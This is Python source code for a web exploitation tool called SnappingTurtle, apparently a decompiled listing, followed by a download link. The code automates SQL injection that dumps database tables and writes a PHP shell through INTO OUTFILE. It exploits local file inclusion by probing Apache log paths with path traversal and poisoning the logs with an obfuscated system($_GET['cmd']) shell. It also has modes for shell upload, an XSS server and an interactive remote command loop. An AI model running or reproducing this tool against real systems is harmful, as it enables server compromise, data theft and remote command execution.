SqlUnionInjector({"HOST": "localhost", "PORT": 80}, ((self.output).columnCount), ((self.output).columnNumber), columns, table, delimiter = ((self.output).begin), where = where, terminator = ((self.output).end)) (injector.payload) = (injector.dump) resp = (self.sendRequest)((injector.str)()) return (injector.finalize)(resp) def parseSchema(self, schemas): if (schemas == None): return None def var_func_00000015(x): return x[0] d = distinct((lambda var_00000014:select(var_func_00000015, var_00000014))(schemas)) dbs = dict() def var_func_00000016(y): return y[1] def var_func_00000017(y): return (x == y[0]) for x in d: dbs[x] = (lambda var_00000015:select(var_func_00000016, var_00000015))((lambda var_00000016:where(var_func_00000017, var_00000016))(schemas)) return dbs def listSchemas(self): return (self.parseSchema)((self.inject)(["TABLE_SCHEMA", "TABLE_NAME"], "INFORMATION_SCHEMA.Tables")) def listColumns(self, schema, table): (self.log)("[?] Querying information schema for column names") whereTmpl = (" WHERE INFORMATION_SCHEMA.COLUMNS.TABLE_SCHEMA = '{0}' AND" + " INFORMATION_SCHEMA.COLUMNS.TABLE_NAME='{1}'") cols = (self.inject)(["COLUMN_NAME"], "INFORMATION_SCHEMA.COLUMNS", where = (whereTmpl.format)(schema, table)) if (cols == None): (self.log)("[X] Could not query information schema\r\n") return None def var_func_00000018(x): return x[0] cols = (lambda var_00000017:select(var_func_00000018, var_00000017))(cols) def var_func_00000019(x): return (("[" + x) + "]") tup = (lambda var_00000018:join(", ", var_00000018))((lambda var_00000019:select(var_func_00000019, var_00000019))(cols)) (self.log)(("\r\n[+] Columns found: %s\r\n" % tup)) return cols def dumpTable(self, table, schema = None, columns = None): return (self.inject)((((self.listColumns)(schema, table)) if ((schema != None)) else (columns)), table) def sendRequest(self, injection): values = {"sqli": injection} return (Http.request)(((self.httpTemplate).getUrl)(values), ((self.httpTemplate).getPost)(values)) def createInjection(self, begin, end, cols): def var_func_0000001A(): return ((self.emitter).unionAll)(cols) return Injection(begin, end, var_func_0000001A) class TraversalRange(ExploitComponent): def __init__(self, files, start, stop, dot = ".", separator = "/", terminator = ""): (self.files) = files (self.start) = start (self.stop) = stop (self.dot) = dot (self.separator) = separator (self.terminator) = terminator (self.file_index) = 0 (self.i) = start def next(self): if ((self.i) < (self.stop)): i = (self.i) f = (self.file_index) (self.file_index) = ((self.file_index) + 1) if ((self.file_index) == len((self.files))): (self.file_index) = 0 (self.i) = ((self.i) + 1) return (self.getTravSeq)(i, f) else: raise StopIteration def getTravSeq(self, len, file_index): p = (lambda var_0000001A:join((self.separator), var_0000001A))((self.files)[file_index]) return ((((((self.dot) * 2) + (self.separator)) * len) + p) + (self.terminator)) def __iter__(self): return self class TraversalProbe(ExploitComponent): dirs = [["apache", "logs"], ["apache2", "logs"], ["etc", "httpd", "logs"], ["opt", "lampp", "logs"], ["usr", "local", "apache", "logs"], ["var", "log"], ["var", "log", "apache"], ["var", "log", "apache2"], ["var", "log", "httpd"], ["var", "www", "logs"], ["xampp", "apache", "logs"]] names = ["access.log", "access_log", "acces.log", "acces_log", "error.log", "error_log"] def __init__(self, searchValue, reqTmpl, dot = ".", separator = "/", terminator = "", min = 0, max = 8): (self.searchValue) = searchValue (self.reqTmpl) = reqTmpl (self.dot) = dot (self.separator) = separator (self.terminator) = terminator (self.min) = min (self.max) = max (self.files) = (self.createPaths)() def createPaths(self): def var_func_0000001B(x): def var_func_00000031(y): return (x + [y]) return (lambda var_0000001B:select(var_func_00000031, var_0000001B))((self.names)) return (lambda var_0000001C:selectMany(var_func_0000001B, var_0000001C))((self.dirs)) def seqs(self): return TraversalRange((self.files), (self.min), (self.max), (self.dot), (self.separator), (self.terminator)) def scan(self): for x in (self.seqs)(): r = (self.testSeq)(x) if (r != None): return r def testSeq(self, seq): values = {"lfi": seq} url = ((self.reqTmpl).getUrl)(values) (self.log)(("[?] %s" % url)) data = ((self.reqTmpl).getPost)(values) if (data != None): (self.log)((" " + str(data))) resp = ((urllib2.urlopen)(url, data).read)() t = url, data return ((t) if ((resp.__contains__)((self.searchValue))) else (None)) from random import shuffle, randint class PhpShellEmitter(): stages = [[], [], [], []] emitter = None prefix = None suffix = None padMin = 10 padMax = 32 junkChars = (lambda var_0000001D:select(chr, var_0000001D))((lambda var_0000001E:where(var_func_0000001C, var_0000001E))((lambda var_0000001F:where(var_func_0000001D, var_0000001F))(range(33, 127)))) def __init__(self): (self.emitter) = PhpEmitter() def stageDecl(self, stage, value): id, assign = ((self.emitter).declStmt)(value) ((self.stages)[stage].append)(assign) return id def varRef(self, stage, name): return (self.stageDecl)(stage, ("$" + (self.stageDecl)((stage - 1), ((self.emitter).string)(name, False)))) def emit(self, command = None, pad = False): ((self.emitter).chr) = (self.stageDecl)(0, ((self.emitter).string)("chr", False, False)) system = (self.stageDecl)(1, ((self.emitter).string)("system", False)) if (command == None): input = (self.varRef)(2, "_GET") systemCallStmt = ((self.emitter).callStmt)(system, ((self.emitter).arrayAccess)(input, ((self.emitter).string)("cmd", False))) else: cmdStr = ((self.emitter).string)(command, False) systemCallStmt = ((self.emitter).callStmt)(system, cmdStr) ((self.stages)[3].append)(systemCallStmt) (lambda var_00000020:iter(shuffle, var_00000020))((lambda var_00000021:skip(1, var_00000021))((self.stages))) php = "" x = ((self.emitter).doc)(addAll(flatten((self.stages)))) return ((x) if (not pad) else ((self.pad)(x))) def emitJunk(self): def var_func_0000001E(x): return choice((self.junkChars)) return addAll((lambda var_00000022:select(var_func_0000001E, var_00000022))(range(0, randint((self.padMin), (self.padMax))))) def pad(self, value): (self.prefix) = (self.emitJunk)() (self.suffix) = (self.emitJunk)() return (((self.prefix) + value) + (self.suffix)) from random import choice, randint class PhpEmitter(): varNames = [] chr = "chr" min = -2147483648 max = 2147483647 def doc(self, body): return ("<?php %s ?>" % body) def stmt(self, exp): return (exp + ";") def declStmt(self, value): n = (self.nextVar)() return n, (self.assignStmt)(n, value) def assignStmt(self, var, value): return (self.stmt)(("{}={}".format)(var, value)) def arrayAccess(self, array, dim): return ("{}[{}]".format)(array, dim) def callStmt(self, target, args): return (self.stmt)((lambda var_00000023:(self.call)(target, var_00000023))(args)) def call(self, target, args): return ("{}({})".format)(target, args) def string(self, string, allowPassthru = True, allowChars = True): funcs = [(self.splitString)] if allowChars: (funcs.append)((self.chars)) return choice(funcs)(string) def echo(self, value): return (self.stmt)(("echo %s" % value)) def splitString(self, string): l = len(string) if (l < 2): return (self.string)(string) i = randint(1, (l - 1)) lhs = (self.string)(string[0:i]) rhs = (self.string)(string[i:l]) return ((lhs + ".") + rhs) def chars(self, str): return (lambda var_00000024:join(".", var_00000024))((lambda var_00000025:select((self.char), var_00000025))(str)) def char(self, char): c = ord(char) n = choice([c, (self.widenByte)(c)]) return ("{}({})".format)((self.chr), (self.number)(n)) def number(self, number): return choice([(self.emit), (self.addition), (self.subtraction)])(number) def addition(self, number): def var_func_0000001F(x, y): return (x - y) return (self.binOp)(number, "+", var_func_0000001F) def subtraction(self, number): def var_func_00000020(x, y): return (x + y) return (self.binOp)(number, "-", var_func_00000020) def binOp(self, number, op, func): while True: x = (self.nextInt)() lhs = func(number, x) if ((self.validNum)(x) and (self.validNum)(lhs)): break rhs = (self.number)(x) fmt = (("({}{} {})") if ((op == str(rhs)[:1])) else ("({}{}{})")) return (fmt.format)(lhs, op, rhs) def emit(self, value): return value def nextInt(self): def var_func_00000021(x): return randint(((self.min) >> x), ((self.max) >> x)) return choice((lambda var_00000026:select(var_func_00000021, var_00000026))([0, 8, 16, 32])) def nextVar(self): l = randint(1, 1) def var_func_00000022(x): return (self.getRandChar)() while True: v = ("$" + addAll((lambda var_00000027:select(var_func_00000022, var_00000027))(range(0, l)))) if not ((self.varNames).__contains__)(v): ((self.varNames).append)(v) return v def quote(self, string): return ("\"%s\"" % (self.escape)(string)) def getRandChar(self): return choice((self.getAllChars)()) def getAllChars(self): return (((self.getChars)("a") + (self.getChars)("A")) + "_") def getChars(self, start): def var_func_00000023(x): return chr((ord(start) + x)) return addAll((lambda var_00000028:select(var_func_00000023, var_00000028))(range(0, 26))) def escape(self, string): return ((string.replace)("\\", "\\\\").replace)("\"", "\\\"") def widenByte(self, number): mask = ((self.max) & ~255) while True: x = (((self.nextInt)() & mask) | number) if (self.validNum)(x): return x def validNum(self, number): return (((self.min) <= number) and (number <= (self.max))) from urlparse import urlparse class LogInjector(ExploitComponent): repo = JsonRepository("logShells.json") def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""): (self.reqTmpl) = reqTmpl (self.dot) = dot (self.separator) = separator (self.terminator) = terminator (self.probe) = TraversalProbe("blank command", reqTmpl, dot, separator, terminator) (self.emitter) = PhpShellEmitter() (self.url) = (reqTmpl.url) def findShell(self): (self.log)("[i] Searching for shell") s = ((self.probe).scan)() if (s != None): (self.log)("[+] Shell found") if self.url in self.repo.repo: tags = ((self.repo).repo)[(self.url)] ((self.emitter).prefix) = tags[0] ((self.emitter).suffix) = tags[1] else: (self.log)("[-] Error: could not find shell prefix/suffix") else: (self.log)("[-] Shell not found") return s def sendShell(self): (self.log)("[i] Injecting shell") shell = ((self.emitter).emit)(pad = True) u = ((((self.reqTmpl).getUrl)({"lfi": shell})) if (((self.url).__contains__)("$lfi")) else ((((self.url) + "?") + shell))) ((self.repo).add)((self.url), [((self.emitter).prefix), ((self.emitter).suffix)]) (self.log)((" Url: " + u)) (urllib2.urlopen)(u) def inject(self): shell = (self.findShell)() if (shell == None): (self.sendShell)() shell = (self.findShell)() return shell import urllib class LfiShell(ExploitComponent): shellInfo = None def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""): (self.injector) = LogInjector(reqTmpl, dot, separator, terminator) def create(self): i = ((self.injector).inject)() if (i == None): (self.log)("[-] Could not exploit LFI") return False (self.shellInfo) = i return True def run(self, cmd): if ((self.shellInfo) == None): (self.log)("[!] No known shell") if not (self.create)(): return None quit() u = (self.createCmdUrl)(cmd) (self.log)(("[?] %s" % u)) _, d = (self.shellInfo) postData = d if (postData != None): (self.log)((" " + str(postData))) resp = (self.parseResp)(((urllib2.urlopen)(u, postData).read)()) return resp def parseResp(self, resp): def fan(v): def var_func_00000024(x): return [x, (x.upper)(), (x.lower)()] return distinct((lambda var_00000029:selectMany(var_func_00000024, var_00000029))([v, ((v.replace)("\\", "\\\\").replace)("\"", "\\\"")])) def split(v, t): for tag in fan(t): if (len(v) != 2): v = (v[0].split)(tag) else: break return v e = ((self.injector).emitter) if ((e.prefix) == None): return resp p = split([resp], (e.prefix)) if (len(p) < 2): return resp return split([p[1]], (e.suffix))[0] def createCmdUrl(self, cmd): u, _ = (self.shellInfo) d = (urllib.urlencode)({"cmd": cmd}) x = (("&") if ((u.__contains__)("?")) else ("?")) return ((u + x) + d) class SqlEmitter(): alpha = (CharRange.alpha)() def getChars(self): def var_func_00000025(___p_op_5): return (___p_op_5 != (self.quote)()) return (lambda var_0000002A:select(chr, var_0000002A))((lambda var_0000002B:where(var_func_00000025, var_0000002B))(range(32, 128))) def tup(self, vals): def var_func_00000026(x, y): return (((x + ",") + (self.space)()) + y) return (lambda var_0000002C:aggr(var_func_00000026, var_0000002C))(vals) def words(self, words): def var_func_00000027(x, y): return ((x + (self.space)()) + y) return (lambda var_0000002D:aggr(var_func_00000027, var_0000002D))(words) def space(self): return " " def quote(self): return "'" def junkCharRange(self): def var_func_00000028(x): return choice((self.alpha)) return (lambda var_0000002E:join("", var_0000002E))((lambda var_0000002F:select(var_func_00000028, var_0000002F))((lambda var_00000030:range(0, var_00000030))(randint(8, 32)))) def junkString(self): return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)()) def unionAll(self, cols): return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)]) def comment(self): return "#" import re class SqlUnionInjector(ExploitComponent): def __init__(self, options, columns, dump_column, target_columns, target_table, delimiter = "'", delim = "'", row_start = "--start--", row_end = "--end--", where = None, terminator = "#"): (self.options) = options (self.columns) = columns (self.dump_column) = dump_column (self.target_columns) = target_columns (self.target_table) = target_table (self.delimiter) = delimiter (self.delim) = delim (self.row_start) = row_start (self.row_end) = row_end (self.where) = where (self.terminator) = terminator (self.host) = options["HOST"] (self.port) = options["PORT"] (self.dump) = ("Dump {}".format)(target_table) (self.shell) = None (self.payload) = None options["PAYLOAD"] = dict(options = [(self.dump), (self.shell)], selected = (self.dump)) def set_payload(self, payload): def var_func_00000029(): (self.payload) = payload return var_func_00000029 def is_dump(self): return ((self.payload) == (self.dump)) def str(self): s = "" if (self.delimiter): s += (self.delimiter) s += "UNION SELECT " if (self.delim): empty = ((self.delim) * 2) delim = (self.delim) else: empty = "0" delim = "'" if (self.is_dump)(): s += (self.union)(empty, delim) if ((self.where) != None): s += (" " + (self.where)) else: s += (self.shell)(empty, delim) s += (self.terminator) return s def union(self, empty, delim): s = ((empty + ",") * (self.dump_column)) s += ("CONCAT_WS({0}stdelim{0},{0}{1}{0},".format)(delim, (self.row_start)) def var_func_0000002A(x): return ("IFNULL(%s,'')" % x) s += (",".join)((lambda var_00000031:select(var_func_0000002A, var_00000031))((self.target_columns))) s += (",{0}{1}{0})".format)(delim, (self.row_end)) s += (("," + empty) * (((self.columns) - (self.dump_column)) - 1)) s += (" FROM {}".format)((self.target_table)) return s def shell(self, empty, delim): shell_delim = (("\"") if ((delim == "'")) else ("'")) shell = ("{0}<?php system($_GET[{1}cmd{1}]); ?>{0}".format)(delim, shell_delim) col_seq = (shell + (("," + empty) * ((self.columns) - 1))) directory = "htdocs/" traverse = ("../" * 2) shell_file = "shell.php" s = ("{0} FROM dual INTO OUTFILE {1}{2}{3}{4}{1}{5}".format)(col_seq, delim, traverse, directory, shell_file, (self.terminator)) return s def finalize(self, resp): def var_func_0000002B(___p_op_6): return (___p_op_6.split("stdelim")) if (self.is_dump)(): pattern = ("{}stdelim(.*?)stdelim{}".format)((self.row_start), (self.row_end)) matches = (re.findall)(pattern, resp) return (lambda var_00000032:select(var_func_0000002B, var_00000032))(matches) else: u = ("http://{}:{}/shell.php".format)((self.host), (self.port)) s = ("GET {}\r\n".format)(u) code = ((urllib2.urlopen)(u).getcode)() if (code == 200): s += ("Shell found at {}".format)(u) else: s += "Shell not found, exploit failed" return s import sys from ast import literal_eval class CliArgs(): Mode = None ModeOption = None ModeOption2 = None Get = None Post = None File = None class ParserState(): Class = 0 Url = 1 Option = 2 OptionValue = 3 OptionValue2 = 4 ModeOption = 5 ModeOption2 = 6 Filename = 7 FileData = 8 class ArgOption(): GetPair = "-g" PostPair = "-p" Get = "--g" Post = "--p" File = "-f" class ClassOption(): Lfi = "lfi" Sqli = "sqli" Xss = "xss" Shell = "shell" Upload = "upload" class SqliOption(): List = "list" Table = "table" def parseArgs(): i = 0 key = None key2 = None key3 = None state = (ParserState.Class) obj = CliArgs() args = (lambda var_00000033:skip(1, var_00000033))((sys.argv)) for x in args: _cwSwitchValue_0000 = state if (_cwSwitchValue_0000 == (ParserState.Class)): (obj.Mode) = x _cwSwitchValue_0001 = x if ((_cwSwitchValue_0001 == (ClassOption.Sqli)) or (_cwSwitchValue_0001 == (ClassOption.Xss))): state = (ParserState.ModeOption) else: state = (ParserState.Url) else: if (_cwSwitchValue_0000 == (ParserState.ModeOption)): (obj.ModeOption) = x if (((obj.Mode) == (ClassOption.Sqli)) and ((obj.ModeOption) == (SqliOption.Table))): state = (ParserState.ModeOption2) else: state = (ParserState.Url) else: if (_cwSwitchValue_0000 == (ParserState.ModeOption2)): (obj.ModeOption2) = x state = (ParserState.Url) else: if (_cwSwitchValue_0000 == (ParserState.Url)): (obj.Url) = x state = (ParserState.Option) else: if (_cwSwitchValue_0000 == (ParserState.Option)): key = x state = (ParserState.OptionValue) else: if (_cwSwitchValue_0000 == (ParserState.OptionValue)): _cwSwitchValue_0002 = key if (_cwSwitchValue_0002 == (ArgOption.Get)): (obj.Get) = literal_eval(x) state = (ParserState.Option) else: if (_cwSwitchValue_0002 == (ArgOption.Post)): (obj.Post) = literal_eval(x) state = (ParserState.Option) else: if ((_cwSwitchValue_0002 == (ArgOption.GetPair)) or (_cwSwitchValue_0002 == (ArgOption.PostPair))): key2 = x state = (ParserState.OptionValue2) else: if (_cwSwitchValue_0002 == (ArgOption.File)): key2 = x state = (ParserState.Filename) else: if (_cwSwitchValue_0000 == (ParserState.OptionValue2)): d = None _cwSwitchValue_0003 = key if (_cwSwitchValue_0003 == (ArgOption.GetPair)): if ((obj.Get) == None): (obj.Get) = dict() d = (obj.Get) else: if (_cwSwitchValue_0003 == (ArgOption.PostPair)): if ((obj.Post) == None): (obj.Post) = dict() d = (obj.Post) d[key2] = x state = (ParserState.Option) else: if (_cwSwitchValue_0000 == (ParserState.Filename)): key3 = x state = (ParserState.FileData) else: if (_cwSwitchValue_0000 == (ParserState.FileData)): if ((obj.File) == None): (obj.File) = [] ((obj.File).append)(HttpFile(key2, key3, x)) state = (ParserState.Option) else: print(("Error parsing argument: %s" % x)) quit() i = (i + 1) return obj hasArgs = var_func_0000002C(len((sys.argv))) args = parseArgs() import json class ShellCommand(): Quit = "quit" def shellLoop(shell): while True: cmd = raw_input("st>") _cwSwitchValue_0004 = cmd if (_cwSwitchValue_0004 == (ShellCommand.Quit)): print("Exiting") quit() else: print((shell.run)(cmd)) def listTables(tmpl): probe = SqlUnionProbe(tmpl) di = (probe.listSchemas)() if (di == None): print("[X] List tables failed\r\n") return None keys = (di.keys)() print(("[+] %s databases found\r\n" % len(keys))) for key in keys: print((" " + key)) for table in di[key]: print((" " + table)) print("") def printTable(columns, rows): def var_func_0000002D(x): return "" rows = (([columns] + [(lambda var_00000034:select(var_func_0000002D, var_00000034))(columns)]) + rows) def var_func_0000002E(x): return (sorted(x, reverse = True)[0] + 1) def var_func_0000002F(x): def var_func_00000032(y): return ((len(y[x])) if ((x < len(y))) else (0)) return (lambda var_00000035:select(var_func_00000032, var_00000035))(rows) colLens = (lambda var_00000036:select(var_func_0000002E, var_00000036))((lambda var_00000037:select(var_func_0000002F, var_00000037))(range(0, len(columns)))) for row in rows: i = 0 for col in row: maxLen = colLens[i] pad = (maxLen - len(col)) ((sys.stdout).write)((col + (" " * (pad + 1)))) i = (i + 1) ((sys.stdout).write)("\r\n") ((sys.stdout).write)("\r\n") print(("SnappingTurtle Web Exploitation Tool 0.1." + "0324.1445")) print("http://autosectools.com/SnappingTurtle\r\n") if hasArgs: shell = None tmpl = HttpRequestTemplate((args.Url), (args.Get), (args.Post), (args.File)) _cwSwitchValue_0005 = (args.Mode) if (_cwSwitchValue_0005 == (ClassOption.Lfi)): print("[i] Exploiting local file inclusion") shell = LfiShell(tmpl) if not (shell.create)(): print("[X] Failed to create shell, exiting\r\n") quit() else: if (_cwSwitchValue_0005 == (ClassOption.Sqli)): print("[i] Exploiting SQL injection") _cwSwitchValue_0006 = (args.ModeOption) if (_cwSwitchValue_0006 == (SqliOption.List)): print("[?] Listing databases and tables") listTables(tmpl) else: if (_cwSwitchValue_0006 == (SqliOption.Table)): p = ((args.ModeOption2).split)(".") schema = p[0] table = p[1] print(("[?] Dumping table '{}' of database '{}'".format)(table, schema)) probe = SqlUnionProbe(tmpl) columns = (probe.listColumns)(schema, table) if (columns == None): print("[X] Could not enumerate columns\r\n") quit() rows = (probe.dumpTable)(table, columns = columns) if (rows != None): print("\r\n[+] Table dumped:\r\n") printTable(columns, rows) else: print("[X] Could not dump table\r\n") quit() else: print("[X] Invalid SQL injection option\r\n") quit() quit() else: if (_cwSwitchValue_0005 == (ClassOption.Xss)): print("[i] Starting XSS server\r\n") ip = (args.ModeOption) server = ExploitServer(ip) xss = (server.createExploit)(tmpl) print(("[+] XSS URL:\r\n\r\n %s\r\n" % xss)) (server.serveForever)() else: if (_cwSwitchValue_0005 == (ClassOption.Upload)): php = (PhpShellEmitter().emit)() values = {"php": php} file = (tmpl.getFile)(values) if ((file == None) or (len(file) == 0)): print("[X] No file specified to upload, exiting.") quit() tup = (lambda var_00000038:join(", ", var_00000038))((lambda var_00000039:select(var_func_00000030, var_00000039))(file)) print(("[i] Uploading: %s\r\n" % tup)) resp = (Http.request)((tmpl.getUrl)(values), (tmpl.getPost)(values), file) print(("\r\n[+] Response:\r\n\r\n%s\r\n" % resp)) quit() else: if (_cwSwitchValue_0005 == (ClassOption.Shell)): print(("[i] Connecting to shell: %s" % (args.Url))) shell = (Shell.open)((args.Url)) if (shell == None): print("[X] Failed to open shell, exiting.") quit() else: print(("[X] Invalid strategy: %s\r\n" % (args.Mode))) quit() shellLoop(shell) else: print("python st.py [exploitation strategy] [url] [inputs]\r\n") print("# Exploitation Strategies\r\n") print(" lfi Local file inclusion. Injection is performed using the $lfi token.") print("") print(" sqli {options} SQL injection. Injection is performed using the $sqli token.") print("") print(" If used, one of two options must be specified:") print("") print(" list Dumps a list of databases and tables.") print(" table {name} Dumps a database table.") print("") print(" xss {server ip} Cross-site scripting. Injection is performed using the $xss token.") print("") print(" If used, a target accessible server IP must be specified for listening.") print("") print(" upload Arbitrary upload. Write data to the server using the -f option.") print("") print(" If used, at least one file must be specified using the -f option.") print(" Built-in shells can be injected using the $php token.") print("") print(" shell {shell url} Connects to a previously created shell.") print("") print("# Url\r\n") print(" The url to exploit. Can be injected into using tokens.\r\n") print("# Inputs\r\n") print(" -g {GET name} {GET value} GET data in key/value format.") print(" -p {POST name} {POST value} POST data in key/value format.") print(" --g {GET data} GET data in Python map format.") print(" --p {POST data} POST data in Python map format.") print(" -f {name} {filename} {file data} POST data as a file.") print("") print("# Examples\r\n") print(" python st.py lfi http://localhost/lfiTest.php?theme=$lfi\r\n") print(" python st.py lfi http://localhost/lfiTest.php -g theme $lfi\r\n") print(" python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00\r\n") print(" python st.py lfi http://localhost/postTest.php --p \"{'theme':'$lfi'}\"\r\n") print(" python st.py sqli list http://localhost/sqliTest.php -g email $sqli\r\n") print(" python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli\r\n") print(" python st.py xss -g search $xss\r\n") print(" python st.py upload -f file shell.php $php\r\n") print(" python st.py shell\r\n") Download SnappingTurtle_0.1.0324.1445.zip (16.3 KB)
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